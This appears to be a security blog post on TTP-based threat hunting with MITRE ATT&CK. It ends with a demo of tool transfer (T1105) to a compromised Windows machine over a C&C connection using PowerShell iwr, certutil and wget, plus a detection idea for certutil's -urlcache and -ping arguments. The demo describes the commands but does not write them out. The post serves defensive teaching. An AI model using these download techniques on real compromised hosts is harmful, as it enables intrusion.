Tag Archives: Mitre

TTP-Based Threat Hunting – Why and How?

In its simplest definition, threat hunting is a process to identify whether adversaries reached to the organization’s network or not.

Despite many precautions taken at the perimeter level and many technologies used, breaches cannot be prevented. As a result of this situation, technologies to detect whether an attacker is inside have also come to the fore in recent years. EDRs and NDRs are mostly developed and used for detecting and they use many different methods for this.

Pyramid of Pain

In the event of a breach, the most important way to lower dwell time is to implement a regular and continuous threat hunting process. Earlier, as discussed in pyramid of pain, there are several methods for threat hunting like using signatures, IoCs, anomaly detection or TTPs.

A signature can be IP addresses, domains, or file hashes about the threat actor but as you can see above, they are at the bottom of the pyramid. Because they can be changed very easily by the attacker and these information mostly include false positives. When attackers register a new domain, or get a new IP address, it will be a 0-day for the organization and will be impossible to detect the attack via IoC sweep.

Therefore, using the attackers’ TTPs for threat hunting will give much more accurate results. Attackers do not change the techniques that they are using frequently, especially if they have been successful before with these techniques. The MITRE ATT&CK framework is the best way for this technique. Many organizations have adapted their infrastructure to miter or continue to work on this issue. If they haven’t started this yet, they should start as soon as possible.

Threat Intelligence: For a better and continuous threat hunting, threat intelligence is essential. There are lots of techniques and tactics in Att&ck and analysts must decide with threat intel where to start. For a start, it may be a good method to start by identifying the actors that will threaten them depending on the country, region and sector of the organization. This process will prioritize TTPs for hunting. It must be ensured that the threat intel provides this information up-to-date.

Developing Hypotheses: After prioritizing the TTPs for hunting, next step is to creating the hypotheses. This step means determining the data that should be collected to detect the adversarial behavior. According to the required data, it is determined with which security controls the detection should be made.

At this stage, also there is a need to make a gap analysis to be ensure that we can detect all the related activity. If necessary, other security controls should be added. This process can be done with security validation tools like Verodin, since In Verodin all tests and reports are Att&ck based. Hunt teams should correct both they can get needed logs from every piece of the network and these logs are sent to SIEM regularly. So Verodin also should be used for these steps.

This data selection phase also provides to use SIEM more effective. By understanding the adversarial techniques, organizations can reduce the log size by reducing the volume of data collected. This will also allow analysts to encounter fewer false positive alerts and saves time.

The most annoying thing in SIEM administration is the volume of data. Thus, while we are getting data from host or network security controls, we should carry out that we do not send useless data to the SIEM. Be careful about both EDR and especially NDR solutions can create huge amount of data.

Ingress Tool Transfer (MITRE ATT&CK T1105)

Attackers may need to download some tools to perform different actions on victim machine. Mostly, these can be some tools to help scan networks to move laterally, or make the attacker permanent on the victim machine. Whatever itself, there are many ways to do it and all of them are very easy to perform.

Here, my victim machine is a Windows 10 client, and I assume that we already exploited the victim’s machine and have a reverse connection. Now, I will create a web server on the attacker machine, so I can download from my web server in victim’s machine. (These works will be a demo for T1105)

Then I copied putty.exe to transfer to the victim. I am checking whether the web server is working or not;

Ingress File Transfer with Powershell

The first way to transfer file we try is powershell. Let’s execute the command below in our C&C terminal to download putty.exe in the victim’s machine and check the file;

“iwr” in the command stands for Invoke-Web Request which is a command in MS Powershell utility. Used to send HTTP and HTTPS request to a web page or a web service.

Ingress File Transfer with Certutil

Certutil.exe is a native Windows binary that is part of the certificate services. You can use certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains (Src: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil).

Attackers uses certutil.exe as a memory-only downloader via built-in -ping argument (Founded by researcher Casey Smith (@SubTee)).

Let’s type the command on C&C connection in the victim’s machine;

This command will download putty.exe that we located in our web server at the beginning.

IoC for Detecting Downloading via Certutil

Everyone can create their own IoC to detect this method, according to their own structure. This IoC looks for -ping and -urlcache arguments in certutil.exe (Src: fireeye.com).


Ingress File Transfer with wget

wget is a package supports downloading files via HTTP, HTTPS, FTP and FTPS. It can be used easily in scripts since it has a nonn-interactive structure. With using C&C connection, let’s run the command below on the victim’s machine;